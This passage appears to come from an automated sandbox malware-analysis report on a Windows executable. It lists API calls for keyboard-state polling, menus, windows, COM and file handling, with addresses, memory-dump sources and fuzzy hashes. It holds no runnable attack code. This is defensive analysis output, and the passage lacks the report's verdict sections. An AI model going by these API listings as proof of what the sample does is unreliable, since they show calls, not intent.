                                                                                                    • SleepConditionVariableCS, xrefs: 001904E4
                                                                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 001904B2
                                                                                                    • kernel32.dll, xrefs: 001904C3
                                                                                                    • InitializeConditionVariable, xrefs: 001904D8
                                                                                                    • WakeAllConditionVariable, xrefs: 001904F2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                    • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                    • API String ID: 66158676-1714406822
                                                                                                    • Opcode ID: 381e656e23903683eaab76d0db65271fa9d571e5676fccd52ff38ee9d3bc24d8
                                                                                                    • Instruction ID: e28bc3b57203926b6c00943d5c783c26946e854f61e165e7d479b03f72604c84
                                                                                                    • Opcode Fuzzy Hash: 381e656e23903683eaab76d0db65271fa9d571e5676fccd52ff38ee9d3bc24d8
                                                                                                    • Instruction Fuzzy Hash: 91210B36A45310AFEF166BF8BC4DB69B7E4DB1DB61F014125F905D7290DFB09C808A50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,0020DCD0), ref: 001F4A18
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 001F4A2A
                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,0020DCD0), ref: 001F4A4F
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,0020DCD0), ref: 001F4A9B
                                                                                                    • StringFromGUID2.OLE32(?,?,00000028,?,0020DCD0), ref: 001F4B05
                                                                                                    • SysFreeString.OLEAUT32(00000009), ref: 001F4BBF
                                                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 001F4C25
                                                                                                    • SysFreeString.OLEAUT32(?), ref: 001F4C4F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                    • API String ID: 354098117-199464113
                                                                                                    • Opcode ID: bfa60e6c7eeef76298e440a3e835a8c6e8f6fe65456afd61ef2f8d0feee3850f
                                                                                                    • Instruction ID: 81099fc2e3f0d677883a938d6e35a27b32ca128f6f6f634f94c754471e42d8da
                                                                                                    • Opcode Fuzzy Hash: bfa60e6c7eeef76298e440a3e835a8c6e8f6fe65456afd61ef2f8d0feee3850f
                                                                                                    • Instruction Fuzzy Hash: B2123F75A00109EFDB14CF94C884EBEBBB5FF45314F158098EA19AB252D735ED46CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetMenuItemInfoW.USER32(00242990,000000FF,00000000,00000030), ref: 001DC888
                                                                                                    • SetMenuItemInfoW.USER32(00242990,00000004,00000000,00000030), ref: 001DC8BD
                                                                                                    • Sleep.KERNEL32(000001F4), ref: 001DC8CF
                                                                                                    • GetMenuItemCount.USER32(?), ref: 001DC915
                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 001DC932
                                                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 001DC95E
                                                                                                    • GetMenuItemID.USER32(?,?), ref: 001DC9A5
                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 001DC9EB
                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001DCA00
                                                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001DCA21
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 1460738036-4108050209
                                                                                                    • Opcode ID: e882c7b4d179f155f50c43e9d65e31e8980012d87424518bc660d22a881cd341
                                                                                                    • Instruction ID: a9acafa21ac92c9366b5cf6ec5f053197e17247e05920d467cfca076155c5097
                                                                                                    • Opcode Fuzzy Hash: e882c7b4d179f155f50c43e9d65e31e8980012d87424518bc660d22a881cd341
                                                                                                    • Instruction Fuzzy Hash: FF61607090125BABDF15CFA8DC98AEEBFB9FB05308F500956F841A3291D774AD45CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 001DE3E9
                                                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 001DE40F
                                                                                                    • _wcslen.LIBCMT ref: 001DE419
                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 001DE469
                                                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 001DE485
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                    • API String ID: 1939486746-1459072770
                                                                                                    • Opcode ID: 27b6382b2c0db88afb445b466e6deed238e45eb4995a6a32ed575eedeb62425e
                                                                                                    • Instruction ID: 828aecd6a4fc6f91789ec5535baf2fca0ade111500d412d50a950cf486aa5ace
                                                                                                    • Opcode Fuzzy Hash: 27b6382b2c0db88afb445b466e6deed238e45eb4995a6a32ed575eedeb62425e
                                                                                                    • Instruction Fuzzy Hash: 5B41E6729403047BEF15BBA49C47EBF77ACEF66710F10006AF900A61C2FB74DA1196A5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 001E469A
                                                                                                    • _wcslen.LIBCMT ref: 001E46C7
                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 001E46F7
                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 001E4718
                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 001E4728
                                                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 001E47AF
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 001E47BA
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 001E47C5
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                    • String ID: :$\$\??\%s
                                                                                                    • API String ID: 1149970189-3457252023
                                                                                                    • Opcode ID: 49a2a323a75831d6be16c5020c2de57d84d0264e0f65719a7783f5ac692f319e
                                                                                                    • Instruction ID: 1173fbcf9631e4a90a0983d87b36ce129caf5b5cf8ad73721f75aa5921e8fd52
                                                                                                    • Opcode Fuzzy Hash: 49a2a323a75831d6be16c5020c2de57d84d0264e0f65719a7783f5ac692f319e
                                                                                                    • Instruction Fuzzy Hash: AE31C2B5904249ABDB209FA1DC49FEF37BCEF89740F1041B9FA09D6061EB7096848B64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetKeyboardState.USER32(?), ref: 001DA8EE
                                                                                                    • SetKeyboardState.USER32(?), ref: 001DA959
                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 001DA979
                                                                                                    • GetKeyState.USER32(000000A0), ref: 001DA990
                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 001DA9BF
                                                                                                    • GetKeyState.USER32(000000A1), ref: 001DA9D0
                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 001DA9FC
                                                                                                    • GetKeyState.USER32(00000011), ref: 001DAA0A
                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 001DAA33
                                                                                                    • GetKeyState.USER32(00000012), ref: 001DAA41
                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 001DAA6A
                                                                                                    • GetKeyState.USER32(0000005B), ref: 001DAA78
                                                                                                    Similarity
                                                                                                    • API ID: State$Async$Keyboard
                                                                                                    • String ID:
                                                                                                    • API String ID: 541375521-0
                                                                                                    • Opcode ID: 67da9145aec5bcd27853b0eaa8388ce6f703c0cf2961f3e60b64993635685ac0
                                                                                                    • Instruction ID: 0c45f8154e7fec53386d982f241d80142ff506b8b205e284904e9523e49ba31a
                                                                                                    • Opcode Fuzzy Hash: 67da9145aec5bcd27853b0eaa8388ce6f703c0cf2961f3e60b64993635685ac0
                                                                                                    • Instruction Fuzzy Hash: 1551D62090878869EB35E7B089547AABFB49F11340F88459BD9C25B3C2DB549A4CCBA3
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 001D6571
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 001D658A
                                                                                                    • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 001D65E8
                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 001D65F8
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 001D660A
                                                                                                    • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 001D665E
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 001D666C
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 001D667E
                                                                                                    • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 001D66C0
                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 001D66D3
                                                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 001D66E9
                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 001D66F6
                                                                                                    Similarity
                                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                                    • String ID:
                                                                                                    • API String ID: 3096461208-0
                                                                                                    • Opcode ID: fb262de6ebf814a926a9e210a55985f67f09cce8b5d05839a611ccc35f783f34
                                                                                                    • Instruction ID: a1ee804e06e1dd56f7dabb014116d079817af50d3fd24f06e45e739d8a2e74fd
                                                                                                    • Opcode Fuzzy Hash: fb262de6ebf814a926a9e210a55985f67f09cce8b5d05839a611ccc35f783f34
                                                                                                    • Instruction Fuzzy Hash: 19510E71A01305AFDF08CFA8DD89AAEBBB9FB48300F508129F519E7295D7719D048B50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 001721E4: GetWindowLongW.USER32(?,000000EB), ref: 001721F2
                                                                                                    • GetSysColor.USER32(0000000F), ref: 00172102
                                                                                                    Similarity
                                                                                                    • API ID: ColorLongWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 259745315-0
                                                                                                    • Opcode ID: 8751e0b1058b2df1ee2e8f851d21f30fd8ff5cf90f65cf1290decc61a398ce33
                                                                                                    • Instruction ID: 85ed1aea1c0c028d1be255155e995bd5b6311550ac2979e4a2e018855e4f64f4
                                                                                                    • Opcode Fuzzy Hash: 8751e0b1058b2df1ee2e8f851d21f30fd8ff5cf90f65cf1290decc61a398ce33
                                                                                                    • Instruction Fuzzy Hash: 6141A431101740AFDB345F78AC48BBA7B75BB46320F558655FAAA872E1CB319D43DB10
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0020499A
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 002049A1
                                                                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 002049B4
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 002049BC
                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 002049C7
                                                                                                    • DeleteDC.GDI32(00000000), ref: 002049D1
                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 002049DB
                                                                                                    • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 002049F1
                                                                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 002049FD
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                    • String ID: static
                                                                                                    • API String ID: 2559357485-2160076837
                                                                                                    • Opcode ID: 0b6de1a5755b91203b3c1b84c17a9bf501d837938adfbef50ecaa21f0984e2cc
                                                                                                    • Instruction ID: 9fdc2a5c18eec5cb8cad5a4b5546cb018fbd3d141510b8c4428316871fb338c5
                                                                                                    • Opcode Fuzzy Hash: 0b6de1a5755b91203b3c1b84c17a9bf501d837938adfbef50ecaa21f0984e2cc
                                                                                                    • Instruction Fuzzy Hash: CB316D7211131AABDF11AFA4EC08FDA3B69FF0D324F104211FA58A60E1C735E820DB54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • VariantInit.OLEAUT32(?), ref: 001F45B9
                                                                                                    • CoInitialize.OLE32(00000000), ref: 001F45E7
                                                                                                    • CoUninitialize.OLE32 ref: 001F45F1
                                                                                                    • _wcslen.LIBCMT ref: 001F468A
                                                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 001F470E
                                                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 001F4832
                                                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 001F486B
                                                                                                    • CoGetObject.OLE32(?,00000000,00210B64,?), ref: 001F488A
                                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 001F489D
                                                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001F4921
                                                                                                    • VariantClear.OLEAUT32(?), ref: 001F4935
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 429561992-0
                                                                                                    • Opcode ID: 66ef851d44d95b214817d08d3adc4d8e8acc261ef0d083a51b24db1b94f2f6ce
                                                                                                    • Instruction ID: 13458e019f4d86dabddc7ed8ef0745047cf0983987f052c1f20991b1a7a595db
                                                                                                    • Opcode Fuzzy Hash: 66ef851d44d95b214817d08d3adc4d8e8acc261ef0d083a51b24db1b94f2f6ce
                                                                                                    • Instruction Fuzzy Hash: E7C146716083099FD700EF68C88496BB7E9FF89758F10491DFA899B221DB70ED46CB52
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • CoInitialize.OLE32(00000000), ref: 001E844D
                                                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 001E84E9
                                                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 001E84FD
                                                                                                    • CoCreateInstance.OLE32(00210CD4,00000000,00000001,00237E8C,?), ref: 001E8549
                                                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 001E85CE
                                                                                                    • CoTaskMemFree.OLE32(?,?), ref: 001E8626
                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 001E86B1
                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 001E86D4
                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 001E86DB
                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 001E8730
                                                                                                    • CoUninitialize.OLE32 ref: 001E8736
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                    • String ID:
                                                                                                    • API String ID: 2762341140-0
                                                                                                    • Opcode ID: 707db0a18d3e053a31d4f8205400562574746c493be776487cb548d54c15f1f8
                                                                                                    • Instruction ID: 78477573f555a249cd698ac39884a61969933857aeb3b78957e37e6a52951251
                                                                                                    • Opcode Fuzzy Hash: 707db0a18d3e053a31d4f8205400562574746c493be776487cb548d54c15f1f8
                                                                                                    • Instruction Fuzzy Hash: 69C10B75A00649EFCB14DFA5C888DAEBBF9FF48314B148498E519EB261CB30ED45CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 001D033F
                                                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 001D0398
                                                                                                    • VariantInit.OLEAUT32(?), ref: 001D03AA
                                                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 001D03CA
                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 001D041D
                                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 001D0431
                                                                                                    • VariantClear.OLEAUT32(?), ref: 001D0446
                                                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 001D0453
                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001D045C
                                                                                                    • VariantClear.OLEAUT32(?), ref: 001D046E
                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001D0479
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                    • String ID:
                                                                                                    • API String ID: 2706829360-0
                                                                                                    • Opcode ID: 6535167db319951c8e806ab46740d6f56e8fd3fc3b41e3861848ca5a3963e700
                                                                                                    • Instruction ID: f9d75ddd919f082273f739db32a184337970da1f01276912aaf91f87b2e36e44
                                                                                                    • Opcode Fuzzy Hash: 6535167db319951c8e806ab46740d6f56e8fd3fc3b41e3861848ca5a3963e700
                                                                                                    • Instruction Fuzzy Hash: C9415F75A00219AFCF05DFA4D848EEEBBB9FF58354F008069E955A7362C730A945CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 00172441: GetWindowLongW.USER32(00000000,000000EB), ref: 00172452
                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 0020A926
                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 0020A946
                                                                                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0020AB83
                                                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0020ABA1
                                                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0020ABC2
                                                                                                    • ShowWindow.USER32(00000003,00000000), ref: 0020ABE1
                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0020AC06
                                                                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 0020AC29
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1211466189-3916222277
                                                                                                    • Opcode ID: c31994c384cd868bc7646520ef0f14e7911dacdb99849cfd8aedaca9085d37d2
                                                                                                    • Instruction ID: 8dc4460a13fe339720b55c2226a702351acab65ad6283f9ccff85caaf3d7c47c
                                                                                                    • Opcode Fuzzy Hash: c31994c384cd868bc7646520ef0f14e7911dacdb99849cfd8aedaca9085d37d2
                                                                                                    • Instruction Fuzzy Hash: A9B1CA3161031ADFDF14CF68C9887AE7BB2FF44704F598069EC499B296D730A9A0CB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetLocalTime.KERNEL32(?), ref: 001E8BB1
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 001E8BC1
                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 001E8BCD
                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001E8C6A
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 001E8C7E
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 001E8CB0
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 001E8CE6
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 001E8CEF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                    • String ID: *.*
                                                                                                    • API String ID: 1464919966-438819550
                                                                                                    • Opcode ID: 784392ae5277acd7faec33686926fa6029f71abb5abe9dc9d67ab3184b6eac91
                                                                                                    • Instruction ID: c23b7bfa067d1f3aa0cb0a236cd288769b4e8df1aa2ea80b653b1f441bcaa043
                                                                                                    • Opcode Fuzzy Hash: 784392ae5277acd7faec33686926fa6029f71abb5abe9dc9d67ab3184b6eac91
                                                                                                    • Instruction Fuzzy Hash: 766179B25087459FCB10EF61C8449AFB3E9FF99314F04891EF98987251EB31EA45CB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • CreateMenu.USER32 ref: 002045D8
                                                                                                    • SetMenu.USER32(?,00000000), ref: 002045E7
                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0020466F
                                                                                                    • IsMenu.USER32(?), ref: 00204683
                                                                                                    • CreatePopupMenu.USER32 ref: 0020468D
                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002046BA
                                                                                                    • DrawMenuBar.USER32 ref: 002046C2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                    • String ID: 0$F
                                                                                                    • API String ID: 161812096-3044882817
                                                                                                    • Opcode ID: ff6c9c51e85d5ed378b9153680cadfa409a7e291cafa919a84ea1c452ba80995
                                                                                                    • Instruction ID: 595af496fa095e876a03850c8c5c80fd5769e453e09782d6424d735541081109
